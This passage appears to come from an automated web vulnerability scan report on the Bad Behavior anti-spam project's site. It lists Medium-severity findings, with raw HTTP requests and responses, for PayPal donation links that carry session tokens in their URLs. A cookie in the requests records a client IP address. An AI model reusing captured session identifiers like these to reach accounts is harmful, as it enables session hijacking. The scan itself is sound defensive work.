mit me to do any further work on Bad Behavior, mainly due to the economic recession. If you want this work to continue, as I&#8217;ll outline in the roadmap below, skip your morning latte tomorrow and <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">send me a financial contribution</a>
...[SNIP]...
>Only one thing remains, and that is to do the work. As I noted before, Bad Behavior is a user-supported project. If you think this roadmap looks good, and want to accelerate Bad Behavior development, <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">your financial contribution</a>
...[SNIP]...
ling $500 or more would allow me time to complete the majority of the above within a month. I know that a lot of you are having financial trouble due to the economy; so am I. Even if you are unable to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">send a contribution</a>
...[SNIP]...
<p>This is also the time to send in feature requests. If Bad Behavior doesn&#8217;t do something you would like it to do, please leave a comment. (And remember that feature requests accompanied by a <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Ys8MAhDM6x4k3E1RZrHEHz6oy7cOnzYVT8rTLFiHPaOmAK7T_7aMq87yOMG&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If Bad Behavior has helped you, please <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Ys8MAhDM6x4k3E1RZrHEHz6oy7cOnzYVT8rTLFiHPaOmAK7T_7aMq87yOMG&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=I5v32VQFXg0C4-IeIkU040BL1KYrVPKQML2047YOTKF1RZPq3Be3dyMWfPO&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If you find Bad Behavior useful, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=I5v32VQFXg0C4-IeIkU040BL1KYrVPKQML2047YOTKF1RZPq3Be3dyMWfPO&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
<p>Finally, if Bad Behavior has been valuable to you, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=yo8luBOaKVL-Rhxg2AWxXUd7AFvPOVLb_7_hq3YexObc1w1uDFQFh0V0lyi&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a contribution to further Bad Behavior development</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=wuCX6JDUDuOIa7rG97-dHgUBF3ERMjtjfY5rWZz9c2zlkqGrui0dGy_4d64&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>In the meantime, Bad Behavior remains a user-supported project, with all code released under the GNU General Public License. If you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=wuCX6JDUDuOIa7rG97-dHgUBF3ERMjtjfY5rWZz9c2zlkqGrui0dGy_4d64&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=MI0942tVimDW3IMO15te_zn3keSvnnqdZnKjGJUn1K_7Wwi6IAyz8c8WsVq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=MI0942tVimDW3IMO15te_zn3keSvnnqdZnKjGJUn1K_7Wwi6IAyz8c8WsVq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
<p>If you find Bad Behavior valuable, and you want to see this project up and running sooner rather than later, please <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=g5ftosJDmIbAe87FArhV3QzVYE2dG65AUqbCrbFoBdPFggQnn0SgUYB1trW&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">contribute</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=T11ksg16NmlhxRKFNrO2Chcgt7ay3MzCfq4F9YeM6l0lozd_mCC99WGFPMa&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=T11ksg16NmlhxRKFNrO2Chcgt7ay3MzCfq4F9YeM6l0lozd_mCC99WGFPMa&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.43. http://bad-behavior.ioerror.us/category/open-source/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/open-source/

Request

GET /category/open-source/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762051+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 44374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...

5.44. http://bad-behavior.ioerror.us/category/project-honey-pot/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/project-honey-pot/

Request

GET /category/project-honey-pot/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762058+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 38693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
mit me to do any further work on Bad Behavior, mainly due to the economic recession. If you want this work to continue, as I&#8217;ll outline in the roadmap below, skip your morning latte tomorrow and <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">send me a financial contribution</a>
...[SNIP]...
>Only one thing remains, and that is to do the work. As I noted before, Bad Behavior is a user-supported project. If you think this roadmap looks good, and want to accelerate Bad Behavior development, <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">your financial contribution</a>
...[SNIP]...
ling $500 or more would allow me time to complete the majority of the above within a month. I know that a lot of you are having financial trouble due to the economy; so am I. Even if you are unable to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">send a contribution</a>
...[SNIP]...
<p>This is also the time to send in feature requests. If Bad Behavior doesn&#8217;t do something you would like it to do, please leave a comment. (And remember that feature requests accompanied by a <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Ys8MAhDM6x4k3E1RZrHEHz6oy7cOnzYVT8rTLFiHPaOmAK7T_7aMq87yOMG&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If Bad Behavior has helped you, please <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Ys8MAhDM6x4k3E1RZrHEHz6oy7cOnzYVT8rTLFiHPaOmAK7T_7aMq87yOMG&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...

5.45. http://bad-behavior.ioerror.us/category/spam/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/spam/

Request

GET /category/spam/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762062+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 66861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=ciy6QkMlF7gUAn2u0WTiwHLaPlLqUoZX_hsjf2hzQ072ipIVNqp9q1vz1be&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>Thank you to everyone who has chosen to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=ciy6QkMlF7gUAn2u0WTiwHLaPlLqUoZX_hsjf2hzQ072ipIVNqp9q1vz1be&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Ys8MAhDM6x4k3E1RZrHEHz6oy7cOnzYVT8rTLFiHPaOmAK7T_7aMq87yOMG&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If Bad Behavior has helped you, please <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Ys8MAhDM6x4k3E1RZrHEHz6oy7cOnzYVT8rTLFiHPaOmAK7T_7aMq87yOMG&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=oIGvP-lmgaK2cmKSdEE3JVDL86mY7MfVHvCZw-rRZIsQKbn71pjx42zLLem&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If you find Bad Behavior useful, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=oIGvP-lmgaK2cmKSdEE3JVDL86mY7MfVHvCZw-rRZIsQKbn71pjx42zLLem&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
<p>Finally, if Bad Behavior has been valuable to you, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=yo8luBOaKVL-Rhxg2AWxXUd7AFvPOVLb_7_hq3YexObc1w1uDFQFh0V0lyi&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a contribution to further Bad Behavior development</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=wuCX6JDUDuOIa7rG97-dHgUBF3ERMjtjfY5rWZz9c2zlkqGrui0dGy_4d64&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>In the meantime, Bad Behavior remains a user-supported project, with all code released under the GNU General Public License. If you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=wuCX6JDUDuOIa7rG97-dHgUBF3ERMjtjfY5rWZz9c2zlkqGrui0dGy_4d64&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=MI0942tVimDW3IMO15te_zn3keSvnnqdZnKjGJUn1K_7Wwi6IAyz8c8WsVq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=MI0942tVimDW3IMO15te_zn3keSvnnqdZnKjGJUn1K_7Wwi6IAyz8c8WsVq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.46. http://bad-behavior.ioerror.us/category/windows/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/windows/

Request

GET /category/windows/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762064+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 19208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=DX9a18rVacMq4jm46XSi8VqnZi4FUpEx8U2uB7D0kslQ68fvRz4JQhJx0V8&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>Thank you to everyone who has chosen to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=PCJPgnX7f5vR_17EQl6w8A8K74TR0lDUA4wnJSrfOkt2W7kWMJ2EBm4zZHO&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...

5.47. http://bad-behavior.ioerror.us/category/wordpress-2-0/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/wordpress-2-0/

Request

GET /category/wordpress-2-0/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762077+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 49843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=vPfbWjYK3xALfgcSFcK3NJInkX4RW__qOnvDuBIFKbnPC85_5DebEz9WU34&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>And as always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=vPfbWjYK3xALfgcSFcK3NJInkX4RW__qOnvDuBIFKbnPC85_5DebEz9WU34&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9234nVV46pX_DspSKaDd0n0l0uzfngPCqJiBsx9qjiIY3WY0t7lSvi6inFq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>A representative from a major open source project informed me that the project would be willing to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9234nVV46pX_DspSKaDd0n0l0uzfngPCqJiBsx9qjiIY3WY0t7lSvi6inFq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">contribute financially</a>
...[SNIP]...
<p>If you think this roadmap looks good, and want to accelerate the development of Bad Behavior, <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9234nVV46pX_DspSKaDd0n0l0uzfngPCqJiBsx9qjiIY3WY0t7lSvi6inFq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">contribute financially</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=O5kMZUEHICsdbBg6fYS5mr94uluFYnNfP3q1vK1qSzaVatVzkC0kvAa-ZLa&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=aBYL7z9tngJPWKsJhjZ2sEQlU3uQBp2HXKy5oARpTz-aLwLulUbIMUuyxzu&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>Remember, Bad Behavior is a user-driven project. If you feel that Bad Behavior has been useful to you and want to support its continued development, feel free to send along your <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=aBYL7z9tngJPWKsJhjZ2sEQlU3uQBp2HXKy5oARpTz-aLwLulUbIMUuyxzu&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">holiday wishes</a>. Yes, I know &#8217;tis the season to max out the credit cards. Still, providing you with software that worries about spam so you don&#8217;t have to is what I do. And without <a 